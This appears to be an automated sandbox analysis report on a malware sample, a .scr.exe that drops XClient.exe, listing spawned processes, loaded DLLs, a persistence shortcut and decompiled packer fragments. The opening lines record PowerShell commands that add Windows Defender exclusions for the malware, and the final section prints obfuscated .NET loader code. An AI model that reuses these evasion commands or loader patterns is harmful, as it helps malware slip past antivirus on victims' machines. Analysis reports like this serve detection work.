              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe'Jump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'THITWNSEI24112908089786756456545346568789-00010.scr.exe'Jump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'Jump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: windowscodecs.dllJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: dwrite.dllJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: linkinfo.dllJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: ntshrui.dllJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: cscapi.dllJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: avicap32.dllJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: msvfw32.dllJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
              Source: XClient.lnk.3.drLNK file: ..\..\..\..\..\XClient.exe
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: THITWNSEI24112908089786756456545346568789-00010.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: THITWNSEI24112908089786756456545346568789-00010.scr.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: THITWNSEI24112908089786756456545346568789-00010.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: cxFT.pdb source: THITWNSEI24112908089786756456545346568789-00010.scr.exe, XClient.exe.3.dr
              Source: Binary string: cxFT.pdbSHA256 source: THITWNSEI24112908089786756456545346568789-00010.scr.exe, XClient.exe.3.dr

              Data Obfuscation

              barindex
              .NET source code contains method to dynamically call methods (often used by packers)
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.30d2444.4.raw.unpack, 4QBfyOitSe4w0.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{oH3flyRjabx0jxCH7tXQIiCnuqLbD7Xdr4hJAcFahu20RhEWqLnxgETXpnCwnsiyTa9kAvq.V5iefvrq5ojDNrXhTMMo4zwFWo7bRXWxOZCqoGeeUpQmix0ckylU4EMAyEK5rzrqFBO4vVj,oH3flyRjabx0jxCH7tXQIiCnuqLbD7Xdr4hJAcFahu20RhEWqLnxgETXpnCwnsiyTa9kAvq.GFSxJ5J90XVIk,oH3flyRjabx0jxCH7tXQIiCnuqLbD7Xdr4hJAcFahu20RhEWqLnxgETXpnCwnsiyTa9kAvq._1CGKpY5HgwGOF,oH3flyRjabx0jxCH7tXQIiCnuqLbD7Xdr4hJAcFahu20RhEWqLnxgETXpnCwnsiyTa9kAvq.u4082n7RFaVyO,_3QiiXqkghrMk1.Ds6pGCLI6znqx()}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.30d2444.4.raw.unpack, 4QBfyOitSe4w0.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{mJgaCaREgzuBt[2],_3QiiXqkghrMk1.BvKeDBBOxQxE8(Convert.FromBase64String(mJgaCaREgzuBt[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.30d2444.4.raw.unpack, 4QBfyOitSe4w0.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { mJgaCaREgzuBt[2] }}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.307b134.0.raw.unpack, 4QBfyOitSe4w0.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{oH3flyRjabx0jxCH7tXQIiCnuqLbD7Xdr4hJAcFahu20RhEWqLnxgETXpnCwnsiyTa9kAvq.V5iefvrq5ojDNrXhTMMo4zwFWo7bRXWxOZCqoGeeUpQmix0ckylU4EMAyEK5rzrqFBO4vVj,oH3flyRjabx0jxCH7tXQIiCnuqLbD7Xdr4hJAcFahu20RhEWqLnxgETXpnCwnsiyTa9kAvq.GFSxJ5J90XVIk,oH3flyRjabx0jxCH7tXQIiCnuqLbD7Xdr4hJAcFahu20RhEWqLnxgETXpnCwnsiyTa9kAvq._1CGKpY5HgwGOF,oH3flyRjabx0jxCH7tXQIiCnuqLbD7Xdr4hJAcFahu20RhEWqLnxgETXpnCwnsiyTa9kAvq.u4082n7RFaVyO,_3QiiXqkghrMk1.Ds6pGCLI6znqx()}}, (string[])null, (Type[])null, (bool[])null, true)
